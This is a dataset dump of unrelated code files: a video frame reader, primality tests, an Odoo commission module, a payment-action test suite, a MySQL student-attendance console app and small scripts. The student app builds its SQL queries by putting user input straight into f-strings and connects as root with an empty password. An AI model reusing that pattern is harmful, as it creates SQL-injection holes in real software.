},\n}\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_retrieve_secret_head.py","file_name":"test_retrieve_secret_head.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19445001984","text":"\"\"\"\n Contains functionality for video frame I/O.\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport h5py\n\n\nclass FrameReader:\n \"\"\"Base class for reading frames from a video source.\"\"\"\n\n def __init__(self):\n self.fps = 0\n self.start_frame = 0\n self.end_frame = 0\n self.total_frames = 0\n self.next_frame_number = 0\n\n self.frame_shape = (0, 0, 0)\n self.last_read_frame = None\n self.frames_read = 0\n self.read_errors = 0\n\n def __init_subclass__(cls, **kwargs):\n super().__init_subclass__(**kwargs)\n\n if not hasattr(cls, \"read_frame\"):\n raise NotImplementedError(\"Derived FrameReader must implement \"\n \"read_frame() method.\")\n\n def get_frame(self, frame_number=None):\n \"\"\"Returns frame, frame_number, and timestamp while also\n handling read errors.\"\"\"\n\n if frame_number is None:\n frame_number = self.next_frame_number\n\n if not self.start_frame <= frame_number <= self.end_frame:\n # Dummy values for if invalid frame is 
requested\n frame = np.zeros(self.frame_shape).astype(np.uint8)\n frame_number = -1\n timestamp = \"00:00:00.000\"\n\n else:\n # Subclass must implement this method\n frame = self.read_frame(frame_number)\n timestamp = self.frame_number_to_timestamp(frame_number)\n\n if frame is None:\n frame = self.last_read_frame\n self.read_errors += 1\n else:\n self.frame_shape = frame.shape\n self.last_read_frame = frame\n self.frames_read += 1\n\n return frame, frame_number, timestamp\n\n def get_n_frames(self, n):\n \"\"\"Calls get_frame in batches of N, returning as lists.\"\"\"\n\n frames, frame_numbers, timestamps = [], [], []\n for _ in range(n):\n frame, frame_number, timestamp = self.get_frame()\n\n frames.append(frame)\n frame_numbers.append(frame_number)\n timestamps.append(timestamp)\n\n return frames, frame_numbers, timestamps\n\n def frame_number_to_timestamp(self, frame_number):\n \"\"\"Simple conversion to get timestamp from frame number.\n Dependent on constant FPS assumption for source video file.\"\"\"\n\n total_s = frame_number / self.fps\n timestamp = pd.Timestamp(\"00:00:00.000\") + pd.Timedelta(total_s, 's')\n timestamp = timestamp.round(freq='us')\n\n return timestamp\n\n\nclass HDF5Reader(FrameReader):\n \"\"\"Subclass using HDF5 data container as frame source.\"\"\"\n\n def __init__(self, filepath, start=0, end=0):\n super().__init__()\n\n # Set file object using filepath for reading frames\n self.filepath = filepath\n self.hdf5_file = h5py.File(str(filepath), \"r\")\n self.dset = self.hdf5_file[\"VideoFrames\"]\n\n # Attempt to read attributes from HDF5 group or dataset\n if len(self.hdf5_file.attrs) > 0:\n attrs = self.hdf5_file.attrs\n elif len(self.dset.attrs) > 0:\n attrs = self.dset.attrs\n else:\n raise RuntimeError(\"Passed HDF5 dataset does not contain attrs.\")\n\n self.fps = attrs.get(\"CAP_PROP_FPS\")\n\n # Set start/end frame numbers, or default if not properly passed\n self.start_frame = start\n if end > 0:\n self.end_frame = end\n else:\n self.end_frame = int(attrs.get(\"CAP_PROP_FRAME_COUNT\"))\n\n self.next_frame_number = self.start_frame\n self.total_frames = self.end_frame - self.start_frame\n\n def read_frame(self, frame_number, increment=True):\n \"\"\"Read frame from HDF5 container, fulfills constraint from\n base class.\"\"\"\n\n try:\n encoded_frame = self.dset[frame_number]\n frame = cv2.imdecode(encoded_frame, cv2.IMREAD_COLOR)\n except ValueError as e:\n print(e)\n print(\"HDF5Reader returning empty frame instead.\")\n frame = None\n\n if increment:\n self.next_frame_number += 1\n\n return frame\n\n\nclass VideoReader(FrameReader):\n \"\"\"Subclass using OpenCV's VideoCapture as frame source.\"\"\"\n\n def __init__(self, filepath, end):\n super().__init__()\n\n # Set file object using filepath for reading frames\n self.filepath = filepath\n self.vid_cap = cv2.VideoCapture(str(filepath))\n self.vid_cap.grab() # Load first frame so retrieve() won't fail\n\n self.fps = self.vid_cap.get(cv2.CAP_PROP_FPS)\n self.start_frame = 0\n if end > 0:\n self.end_frame = end\n else:\n self.end_frame = int(self.vid_cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n self.next_frame_number = self.start_frame\n self.total_frames = self.end_frame - self.start_frame\n\n def read_frame(self, frame_number, increment=True):\n \"\"\"Read frame from video file, fulfills constraint from base\n class.\"\"\"\n\n _, frame = self.vid_cap.retrieve()\n\n if increment:\n self.vid_cap.grab()\n self.next_frame_number += 1\n\n return 
frame\n","repo_name":"joshuacwnewton/swiftwatcher","sub_path":"swiftwatcher/io_video.py","file_name":"io_video.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25790001655","text":"from random import randrange\nimport math\n\n##where the two algorithms diasgree-- the algorithms will produce different outputs when provided with\n##a carmichael number, and a low value of k (high values of k will provide a high probability of true negative results for Fermat, and r!=1).\n##disagreement for non-carmichael composite numbers can occur at small values of k, since false positives can still occur with\n##probability 1/2^k (Fermat) and 1/4^k (MR). for this second case, i set k=1 and played around with some small composite\n##numbers like 2,4, and 6. after running several trials, a few false passes occurred, especially with Fermat's\n\ndef prime_test(N, k):\n\n return fermat(N,k), miller_rabin(N,k)\n\n\ndef mod_exp(x, y, N):\n\n if y == 0: #typical base case\n return 1\n\n z = mod_exp(x, math.floor(y / 2), N) #recursively seek the modulus of square root (x^y)\n\n if y % 2 == 0: #if even, simply return z^2 mod n\n return z ** 2 % N\n\n else: #if odd, scale z^2 by x and then find the modulus\n return x * (z ** 2) % N\n\n\ndef fprobability(k):\n\n return (1 - ((1 / 2) ** k)) #return the complement of the probability of each k returning a false positive, (1/2)^K, under Fermat's\n\ndef mprobability(k):\n\n return (1 - ((1 / 4) ** k)) #same as above, but for a false positive under Miller-Rubin, (1/4)^K\n\n\ndef fermat(N,k):\n\n klist = [] #create array for randomly generate integers ki\n evallist = [] #create array to store all values of r\n\n for ki in range(1, k + 1, 1): #find k random values where 0= range.starting_range and total <= range.ending_range:#2500 0 - 5000\n if commission_type == 'fix':\n sales_manager_commission = range.sales_manager_commission_amount\n sales_person_commission = range.sales_person_commission_amount\n else:\n sales_manager_commission = (line.price_subtotal * range.sales_manager_commission)/100\n sales_person_commission = (line.price_subtotal * range.sales_person_commission)/100\n sum_line_manager.append(sales_manager_commission)\n sum_line_person.append(sales_person_commission)\n\n amount_manager = sum(sum_line_manager)\n amount_person = sum(sum_line_person)\n return amount_person, amount_manager\n\n #@api.multi\n def get_productwise_commission(self):\n sum_line_manager = []\n sum_line_person = []\n amount_person = amount_manager = 0.0\n for order in self:\n for line in order.order_line:\n commission_type = line.product_id.commission_type\n if commission_type:\n if line.product_id.commission_range_ids:\n sales_manager_commission = 0.0\n sales_person_commission = 0.0\n total = line.price_subtotal\n if line.order_id.company_id.currency_id != line.order_id.currency_id:\n amount = line.order_id.currency_id.compute(line.price_subtotal, line.order_id.company_id.currency_id)\n total = amount\n \n for range in line.product_id.commission_range_ids:\n if total >= range.starting_range and total <= range.ending_range:#2500 0 - 5000\n if commission_type == 'fix':\n sales_manager_commission = range.sales_manager_commission_amount\n sales_person_commission = range.sales_person_commission_amount\n else:\n sales_manager_commission = (line.price_subtotal * range.sales_manager_commission)/100\n sales_person_commission = (line.price_subtotal * range.sales_person_commission)/100\n 
sum_line_manager.append(sales_manager_commission)\n sum_line_person.append(sales_person_commission)\n\n amount_manager = sum(sum_line_manager)\n amount_person = sum(sum_line_person)\n return amount_person, amount_manager\n\n #@api.multi\n def get_teamwise_commission(self):\n sum_line_manager = []\n sum_line_person = []\n amount_person = amount_manager = 0.0\n for order in self:\n\n commission_type = order.team_id.commission_type\n if commission_type:\n if order.team_id.commission_range_ids:\n sales_manager_commission = 0.0\n sales_person_commission = 0.0\n total = order.amount_untaxed\n if order.company_id.currency_id != order.currency_id:\n amount = order.currency_id.compute(order.amount_untaxed, order.company_id.currency_id)\n total = amount\n\n for range in order.team_id.commission_range_ids:\n if total >= range.starting_range and total <= range.ending_range:#2500 0 - 5000\n if commission_type == 'fix':\n sales_manager_commission = range.sales_manager_commission_amount\n sales_person_commission = range.sales_person_commission_amount\n else:\n sales_manager_commission = (order.amount_untaxed * range.sales_manager_commission)/100\n sales_person_commission = (order.amount_untaxed * range.sales_person_commission)/100\n\n amount_manager = sales_manager_commission\n amount_person = sales_person_commission\n return amount_person, amount_manager\n\n #@api.multi\n def create_commission(self, amount,commission,type):\n commission_obj = self.env['sales.commission.line']\n product = self.env['product.product'].search([('is_commission_product','=',1)],limit=1)\n for order in self:\n #Salesperson\n if amount != 0.0:\n commission_value = {\n #'sales_team_id': order.team_id.id,\n #'commission_user_id': order.user_id.id,\n 'amount': amount,\n 'origin': order.name,\n 'type':type,\n 'product_id': product.id,\n# 'date' : order.confirmation_date,\n 'date' : order.date_order,\n 'src_order_id': order.id,\n 'sales_commission_id':commission.id,\n 'sales_team_id': order.team_id and order.team_id.id or False,\n 'company_id': order.company_id.id,\n 'currency_id': order.company_id.currency_id.id,\n }\n commission_id = commission_obj.create(commission_value)\n if type == 'sales_person':\n order.commission_person_id = commission_id.id\n if type == 'sales_manager':\n order.commission_manager_id = commission_id.id\n return True\n\n #@api.multi\n def create_base_commission(self, type):\n commission_obj = self.env['sales.commission']\n product = self.env['product.product'].search([('is_commission_product','=',1)],limit=1)\n for order in self:\n if type == 'sales_person':\n user = order.user_id.id\n if type == 'sales_manager':\n user = order.team_id.user_id.id\n\n first_day_tz, last_day_tz = self.env['sales.commission']._get_utc_start_end_date()\n commission_value = {\n 'start_date' : first_day_tz,\n 'end_date': last_day_tz,\n 'product_id':product.id,\n 'commission_user_id': user,\n 'company_id': order.company_id.id,\n 'currency_id': order.currency_id.id,\n }\n commission_id = commission_obj.create(commission_value)\n return commission_id\n\n #@api.multi\n def action_confirm(self):\n res = super(SaleOrder, self).action_confirm()\n when_to_pay = self.env.company.when_to_pay\n if when_to_pay == 'sales_confirm':\n for order in self:\n commission_based_on = order.company_id.commission_based_on if order.company_id else self.env.company.commission_based_on\n if commission_based_on == 'sales_team':\n amount_person, amount_manager = order.get_teamwise_commission()\n elif commission_based_on == 'product_category':\n amount_person, 
amount_manager = order.get_categorywise_commission()\n elif commission_based_on == 'product_template':\n amount_person, amount_manager = order.get_productwise_commission()\n\n #Sale Person\n commission = self.env['sales.commission'].search([\n ('commission_user_id', '=', order.user_id.id),\n ('start_date', '<', order.date_order),\n ('end_date', '>', order.date_order),\n ('state', '=', 'draft'),\n ('company_id', '=', order.company_id.id),\n ], limit=1)\n if not commission:\n commission = order.create_base_commission(type='sales_person')\n order.create_commission(amount_person, commission, type='sales_person')\n\n #Sale Manager\n if not order.user_id.id == order.team_id.user_id.id and order.team_id.user_id:\n commission = self.env['sales.commission'].search([\n ('commission_user_id', '=', order.team_id.user_id.id),\n ('start_date', '<', order.date_order),\n ('end_date', '>', order.date_order),\n ('state', '=', 'draft'),\n ('company_id', '=', order.company_id.id),\n ],limit=1)\n if not commission:\n commission = order.create_base_commission(type='sales_manager')\n order.create_commission(amount_manager,commission, type='sales_manager')\n #order.create_commission(amount_person, amount_manager)\n return res\n \n #@api.multi\n def action_cancel(self):\n res = super(SaleOrder, self).action_cancel()\n for rec in self:\n if rec.commission_manager_id:\n rec.commission_manager_id.state = 'exception'\n if rec.commission_person_id:\n rec.commission_person_id.state = 'exception'\n return res\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"musaab123/backup_repo","sub_path":"real_estate_commission/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":10948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29285409257","text":"from dataclasses import replace\nfrom datetime import timedelta\n\nimport pytest\nimport yarl\n\nfrom sendr_utils import utcnow\n\nfrom hamcrest import assert_that, equal_to, match_equality, not_none\n\nfrom pay.bill_payments.bill_payments.core.actions.transaction.create import CreateTransactionAction\nfrom pay.bill_payments.bill_payments.core.entities.mpi_3ds_info import MPI3DSInfo\nfrom pay.bill_payments.bill_payments.core.exceptions import (\n BillAlreadyPaidError,\n CoreFailError,\n MixedDepartmentsError,\n OrderAlreadyPaidError,\n OrderNotFoundError,\n PaymentMethodNotSupportedError,\n)\nfrom pay.bill_payments.bill_payments.interactions.kazna import KaznaClient\nfrom pay.bill_payments.bill_payments.interactions.kazna.entities import (\n TDS,\n DepartmentType,\n DeviceChannel,\n MpiExtInfo,\n PayerParams,\n PaymentParams,\n PayRequest,\n PayResponse,\n PayType,\n)\nfrom pay.bill_payments.bill_payments.interactions.kazna.exceptions import KaznaAPIError, KaznaAPIErrorCode\nfrom pay.bill_payments.bill_payments.storage.entities.bill import Bill\nfrom pay.bill_payments.bill_payments.storage.entities.bill_order import BillOrder\nfrom pay.bill_payments.bill_payments.storage.entities.enums import (\n BillStatus,\n OrderStatus,\n PaymentMethodType,\n TransactionStatus,\n)\nfrom pay.bill_payments.bill_payments.storage.entities.order import Order\nfrom pay.bill_payments.bill_payments.storage.entities.transaction import PayerData, Transaction\n\nTOTAL_AMOUNT = int((20000 + 30000 * 0.5) + 2000 * 2) # 39000\n\n\n@pytest.fixture\nasync def first_bill(storage, user, document):\n return await storage.bill.create(\n Bill(\n uid=user.uid,\n supplier_bill_id='bill-1',\n 
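# amount below mirrors the 20000 term in TOTAL_AMOUNT above; the second\n            # fixture bill contributes the 30000 * 0.5 term via its 50% discount\n            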
document_id=document.document_id,\n dep_type=DepartmentType.GIBDD,\n status=BillStatus.NEW,\n amount=20000,\n amount_to_pay=20000,\n bill_date=utcnow(),\n )\n )\n\n\n@pytest.fixture\nasync def second_bill(storage, user, first_bill, document):\n return await storage.bill.create(\n replace(\n first_bill,\n supplier_bill_id='bill-2',\n bill_id=None,\n amount=30000,\n amount_to_pay=30000,\n discount_size='50',\n discount_date=(utcnow() + timedelta(days=3)).date(),\n )\n )\n\n\n@pytest.fixture\nasync def order(storage, user, first_bill, second_bill):\n order = await storage.order.create(Order(status=OrderStatus.NEW, uid=user.uid))\n\n await storage.bill_order.create(BillOrder(order_id=order.order_id, bill_id=first_bill.bill_id))\n await storage.bill_order.create(BillOrder(order_id=order.order_id, bill_id=second_bill.bill_id))\n\n return order\n\n\n@pytest.fixture\ndef params(order):\n return {\n 'uid': order.uid,\n 'order_id': order.order_id,\n 'payment_method': PaymentMethodType.YANDEX_PAY,\n 'payer_full_name': 'Иванов Иван Иванович',\n 'payment_token': 'TOKEN',\n 'mpi_3ds_info': MPI3DSInfo(\n browser_accept_header='ACCEPT_HEADER',\n browser_color_depth=24,\n browser_ip='192.0.2.1',\n browser_language='ru',\n browser_screen_height=1080,\n browser_screen_width=1920,\n browser_tz='-180',\n browser_user_agent='USER_AGENT',\n browser_javascript_enabled=True,\n window_width=640,\n window_height=480,\n ),\n 'return_url': 'https://return-url.test',\n }\n\n\n@pytest.fixture(autouse=True)\ndef mock_kazna(mocker):\n return mocker.patch.object(\n KaznaClient,\n 'pay',\n mocker.AsyncMock(\n return_value=PayResponse(\n payment_id=44444,\n tds=TDS(\n acs_url='https://acs.test',\n creq='creq',\n ),\n )\n ),\n )\n\n\n@pytest.mark.asyncio\nasync def test_calls_kazna(params, mock_kazna, order, first_bill, second_bill):\n transaction = await CreateTransactionAction(**params).run()\n\n mock_kazna.assert_awaited_once_with(\n PayRequest(\n order_id=str(transaction.transaction_id),\n kvit=False,\n payer_params=PayerParams(fio='Иванов Иван Иванович'),\n payment_params=PaymentParams(supplier_bill_id=[first_bill.supplier_bill_id, second_bill.supplier_bill_id]),\n sign=None,\n pay_type=PayType.YANDEXPAY,\n dep_type=DepartmentType.GIBDD,\n amount=TOTAL_AMOUNT,\n mpi_ext_info=MpiExtInfo(\n notification_url='https://notification.invalid',\n browser_accept_header='ACCEPT_HEADER',\n browser_color_depth=24,\n browser_ip='192.0.2.1',\n browser_language='ru',\n browser_screen_height=1080,\n browser_screen_width=1920,\n browser_tz='-180',\n browser_user_agent='USER_AGENT',\n device_channel=DeviceChannel.BROWSER,\n browser_java_enabled=True,\n window_width=640,\n window_height=480,\n tds_notification_url='https://tds.notification.invalid',\n ),\n yp_token='TOKEN',\n return_url='https://return-url.test',\n )\n )\n\n\n@pytest.mark.parametrize(\n 'yenv_type, infered_dep_type',\n (\n pytest.param('development', DepartmentType.GIBDD, id='development-should-fallback'),\n pytest.param('testing', DepartmentType.GIBDD, id='development-should-fallback'),\n pytest.param('production', DepartmentType.UNKNOWN, id='production-should-NOT-fallback'),\n pytest.param('load', DepartmentType.UNKNOWN, id='load-should-NOT-fallback'),\n pytest.param('sandbox', DepartmentType.UNKNOWN, id='sandbox-should-NOT-fallback'),\n ),\n)\n@pytest.mark.asyncio\nasync def test_unknown_dep_fallbacks_to_gibdd(\n mocker, storage, params, mock_kazna, order, first_bill, second_bill, yenv_type, infered_dep_type\n):\n mocker.patch('yenv.type', yenv_type)\n first_bill = 
await storage.bill.save(replace(first_bill, dep_type=DepartmentType.UNKNOWN))\n second_bill = await storage.bill.save(replace(second_bill, dep_type=DepartmentType.UNKNOWN))\n\n await CreateTransactionAction(**params).run()\n\n [pay_request] = mock_kazna.call_args.args\n assert_that(pay_request.dep_type, equal_to(infered_dep_type))\n\n\n@pytest.mark.asyncio\nasync def test_returns_transaction(params, order):\n returned = await CreateTransactionAction(**params).run()\n\n assert_that(\n returned,\n equal_to(\n Transaction(\n order_id=order.order_id,\n status=TransactionStatus.NEW,\n amount=TOTAL_AMOUNT,\n external_payment_id='44444',\n payer_data=PayerData(payer_full_name='Иванов Иван Иванович'),\n transaction_id=match_equality(not_none()),\n payment_method=PaymentMethodType.YANDEX_PAY,\n acs_url=yarl.URL('https://acs.test?creq=creq'),\n created=match_equality(not_none()),\n updated=match_equality(not_none()),\n ),\n ),\n )\n\n\n@pytest.mark.asyncio\nasync def test_stores_transaction_in_db(storage, params):\n returned = await CreateTransactionAction(**params).run()\n\n stored = await storage.transaction.get(returned.transaction_id)\n stored.acs_url = returned.acs_url\n\n assert_that(returned, equal_to(stored))\n\n\n@pytest.mark.asyncio\nasync def test_when_dep_types_are_mixed__raises_error(storage, params, second_bill):\n second_bill = replace(second_bill, dep_type=DepartmentType.FNS)\n second_bill = await storage.bill.save(second_bill)\n\n with pytest.raises(MixedDepartmentsError):\n await CreateTransactionAction(**params).run()\n\n\n@pytest.mark.parametrize('status', set(TransactionStatus) - {TransactionStatus.NEW, TransactionStatus.CANCELLED})\n@pytest.mark.asyncio\nasync def test_when_already_completed(storage, params, order, status):\n transaction = await CreateTransactionAction(**params).run()\n await storage.transaction.save(replace(transaction, status=status))\n\n with pytest.raises(OrderAlreadyPaidError):\n await CreateTransactionAction(**params).run()\n\n\n@pytest.mark.asyncio\nasync def test_cancels_previously_started_transactions(storage, params, order):\n transaction = await CreateTransactionAction(**params).run()\n\n await CreateTransactionAction(**params).run()\n\n transaction = await storage.transaction.get(transaction.transaction_id)\n assert_that(transaction.status, equal_to(TransactionStatus.CANCELLED))\n\n\n@pytest.mark.asyncio\nasync def test_no_tds(mocker, params, order):\n mocker.patch.object(\n KaznaClient,\n 'pay',\n mocker.AsyncMock(return_value=PayResponse(payment_id=44444)),\n )\n\n transaction = await CreateTransactionAction(**params).run()\n\n assert_that(transaction.acs_url, equal_to(None))\n\n\n@pytest.mark.asyncio\nasync def test_authorizes_user(storage, params, order):\n params['uid'] = order.uid + 1\n with pytest.raises(OrderNotFoundError):\n await CreateTransactionAction(**params).run()\n\n\n@pytest.mark.asyncio\nasync def test_unknown_payment_method(storage, params, order):\n params['payment_method'] = 'card'\n with pytest.raises(PaymentMethodNotSupportedError):\n await CreateTransactionAction(**params).run()\n\n\n@pytest.mark.parametrize(\n 'code, expected_exc',\n (\n (KaznaAPIErrorCode.PAYMENT_ALREADY_EXISTS, BillAlreadyPaidError),\n (None, CoreFailError),\n ),\n)\n@pytest.mark.asyncio\nasync def test_kazna_errors(storage, mocker, params, order, code, expected_exc):\n mocker.patch.object(\n KaznaClient,\n 'pay',\n mocker.AsyncMock(\n side_effect=KaznaAPIError(\n method='method',\n service='service',\n status_code=200,\n params={'code': code},\n )\n ),\n 
)\n\n with pytest.raises(expected_exc):\n await CreateTransactionAction(**params).run()\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"pay/tests/unit/core/actions/transaction/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24330978106","text":"\n# Assumption 1 - make sure to run Sql server before executing the code to prevent DB not found errors.\n# Assumption 2 - Student table created with primary key Student_id\n# Assumption 3 - Attendance table created with a composite key consist with Student_id and Date\n# Assumption 4 - Each time the code will run it will check for already created DB and load existing data from it\n\nimport mysql.connector\nfrom mysql.connector import Error\n\nprint(\"*\"*10, \"Wellcome to Class Student Management System\", \"*\"*10, \"\"\"\\n\n\\tPress 1 to Enter student data and attendance data\n\\tPress 2 to Update student details\n\\tPress 3 to Delete student details\n\\tPress 4 to Show tables data (View all or Selected)\n\\tPress 5 to quite\n\"\"\")\n\n# Keep number of records in Student table under 5\ncount=0\n\n# Connecting to DB\ntry:\n connection = mysql.connector.connect(host='localhost', database='Class_Details', user='root', password='')\n cursor = connection.cursor()\nexcept Error as e:\n connection = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"\")\n cursor = connection.cursor()\n cursor.execute(\"CREATE DATABASE Class_Details\")\n\nprint(\"You're connected to database Class_Details :)\")\n\ntry:\n cursor.execute(\"CREATE TABLE Student (Student_id INT(30) PRIMARY KEY, first_name VARCHAR(225), last_name VARCHAR(225), Address VARCHAR(225), Tel VARCHAR(225))\")\nexcept Error as e:\n print(\"Table student already created :)\")\n\ntry:\n cursor.execute(\"CREATE TABLE Attendance (Student_id INT(30), Date VARCHAR(225), attendance VARCHAR(30), PRIMARY KEY (Student_id, Date))\")\nexcept Error as e:\n print(\"Table attendance already created :)\")\n\n# To assign already created rows in Student table\ncursor.execute(\"SELECT COUNT(*) FROM Student;\")\nresult = cursor.fetchone()[0]\ncount=result\nprint(\"Student Table contain \", result, \" Rows .....\")\n\n\n# fun 1 (Enter data for student table)\ndef input_data(s_count):\n print(f\"Student {s_count} details ....\")\n while True:\n try:\n s_id = int(input(\"Enter student id : \"))\n except ValueError:\n print(\"Enter a integer\")\n continue\n fn = input(\"Enter student first name : \")\n ln = input(\"Enter student last name : \")\n ad = input(\"Enter student address : \")\n tel = input(\"Enter student Tel : \")\n cursor.execute(f\"INSERT INTO Student (Student_id,first_name,last_name,Address,Tel)VALUES('{s_id}','{fn}','{ln}','{ad}','{tel}')\")\n # print(\"\\n....Set up attendance....\\n\")\n print(\"Data entered successfully\")\n break\n\n# fun 2 (Enter data for attendance table)\ndef input_attendance(s_count, s_id):\n print(f\"Student {s_count} attendance ....\")\n while True:\n date = input(\"Enter date : \")\n attendance = input(f\"Is student {s_id} present [Y/N] : \")\n attendance=attendance.lower()\n if(attendance=='y') | (attendance=='n'):\n cursor.execute(f\"INSERT INTO Attendance (Student_id,Date,attendance)VALUES('{s_id}','{date}','{attendance}')\")\n break\n else:\n print(\"attendance type you entered is not valid\")\n\n# fun 3 (Check the Previous student id when updating)\ndef previous_student_id():\n while True:\n 
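# keep prompting until the user enters a valid integer student id\n        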
try:\n id = int(input(\"Enter student id : \"))\n return id\n except ValueError:\n print(\"Enter a integer\")\n continue\n\nwhile True:\n choice = input(\"Select operation : \")\n if choice == \"1\":\n# Control fun 1 and fun 2 to insert data to the tables\n count=count+1\n if count<=5:\n input_data(count)\n connection.commit()\n else:\n print(\"Max Student count reached (5)!\")\n elif choice == \"2.5\":\n s_id = previous_student_id()\n input_attendance(count, s_id)\n elif choice == \"2\":\n# Below code for updating a record\n print(\"What do you want to update ^_^\")\n print(\"\"\"\n 0 - Student ID\n 1 - First name\n 2 - Last name\n 3 - Address\n 4 - Tel\n \"\"\")\n ch = input(\">>>\")\n if ch == \"0\":\n print(\"New ID:\")\n st_id = previous_student_id()\n print(\"Old ID:\")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET Student_id = {st_id} WHERE Student_id = {z}\")\n cursor.execute(f\"UPDATE Attendance SET Student_id = {st_id} WHERE Student_id = {z}\")\n elif ch == \"1\":\n fn = input(\"Enter student new first name : \")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET first_name = '{fn}' WHERE Student_id = {z}\")\n elif ch == \"2\":\n ln = input(\"Enter student new last name : \")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET last_name = '{ln}' WHERE Student_id = {z}\")\n elif ch == \"3\":\n ad = input(\"Enter student new address : \")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET Address = '{ad}' WHERE Student_id = {z}\")\n elif ch == \"4\":\n tel = input(\"Enter student new telephone No : \")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET Tel = '{tel}' WHERE Student_id = {z}\")\n else:\n print(\"Not a valid input\")\n continue\n connection.commit()\n elif choice == \"3\":\n# Deleting data from Student table\n print(\"ID of the student you want to delete from the table\")\n st_id = previous_student_id()\n cursor.execute(f\"DELETE FROM Student WHERE Student_id = {st_id}\")\n cursor.execute(f\"DELETE FROM Attendance WHERE Student_id = {st_id}\")\n connection.commit()\n elif choice == \"4\":\n# Display Data\n print(\"\"\"\n Press 1 - See all the Tables with all the data\n Press 2 - Specific data\n \"\"\")\n cc = input(\">>>>\")\n if cc == \"1\":\n # Display the content of student table\n print(\"... Table Student ... \\n\")\n cursor.execute(\"SELECT * FROM Student\")\n result = cursor.fetchall()\n for x in result:\n print(x)\n # Display the content of Attendance table\n print(\"... Table Attendance ... 
\\n\")\n cursor.execute(\"SELECT * FROM Attendance\")\n result = cursor.fetchall()\n for x in result:\n print(x)\n elif cc == \"2\":\n print(\"Enter the student id you want fetch data from\")\n st_id = previous_student_id()\n cursor.execute(f\"SELECT Date, attendance FROM Attendance WHERE Student_id = {st_id}\")\n result=cursor.fetchall()\n for x in result:\n print(x)\n else:\n print(\"Invalid input\")\n continue\n elif choice == \"5\":\n# Program termination\n cursor.close()\n print(\"<-> Program terminated <->\")\n break\n else:\n print(\"Invalid operation try again !\")\n\n\n# reference - https://pynative.com/python-mysql-database-connection/\n# reference - https://www.w3schools.com/python/python_mysql_getstarted.asp","repo_name":"Sasiru382/SQL_Plus_Python_Project","sub_path":"StudentDataSystem.py","file_name":"StudentDataSystem.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29583337606","text":"class Solution:\n def restoreString(self, s: str, indices: List[int]) -> str:\n sol = []\n for i, c in enumerate(s):\n sol.append((indices[i], c))\n sol.sort()\n answer = \"\"\n for c in sol:\n answer += c[1]\n return answer\n ","repo_name":"Ihyun/LeetCode","sub_path":"shuffle-string/shuffle-string.py","file_name":"shuffle-string.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38919022950","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\npath = '../data/labelled_supertree/ottnames-childrenPlot.csv'\n# path = '../data/labelled_supertree/ottnames-childrenPlot-cellular_organisms.csv'\n# path = '../data/labelled_supertree/ottnames-childrenPlot-eukaryota.csv'\n\n\ndata = pd.read_csv(path, header=None)\n# print(data)\n\nprint(len(data))\n# plt.hist(data, bins=154)\n# plt.hist(data, bins=221)\n# plt.hist(data, bins=154)\n# plt.hist(data, bins=92)\nplt.hist(data, bins=235)\n# plt.xlim(0,31000)\n# plt.xlim(0,8900)\n# plt.xlim(0,31000)\n# plt.xlim(0,1000)\n# plt.xlim(0,5000)\n# plt.xscale('log')\nplt.yscale('log')\n# plt.title(\"Children per Node - Cellular Organisms\")\n# plt.title(\"Children per Node - Eukaryota\")\n# plt.title(\"Children per Node - Bacteria\")\n# plt.title(\"Children per Node - Archaea\")\nplt.title(\"Children per Node - Metazoa\")\n\nplt.xlabel(\"#Children\")\nplt.ylabel(\"#Nodes*#Children\")\n# i = 30818/154\n# i = 8855/221\n# i = 30818/154\n# i = 918/92\ni = 4747/235\nprint(i)\n\n# plt.text(22500, 100000, \"width of bins = 200\")\n# plt.text(22500, 50000, \"highest degree of node is 30818\")\n# plt.text(22500, 25000, \"#nodes = 265641\")\n# plt.text(6500, 100000, \"width of bins = 40\")\n# plt.text(6500, 50000, \"highest degree of node is 8855\")\n# plt.text(6500, 25000, \"#nodes = 243237\")\n# plt.text(20000, 10000, \"width of bins = 200\")\n# plt.text(20000, 5000, \"highest degree of node is 30818\")\n# plt.text(700, 400, \"width of bins = 10\")\n# plt.text(700, 250, \"highest degree of node is 919\")\n# plt.text(700, 150, \"#nodes = 522\")\nplt.text(3500, 100000, \"width of bins = 20\")\nplt.text(3500, 50000, \"highest degree of node is 4747\")\nplt.text(3500, 25000, \"#nodes = 
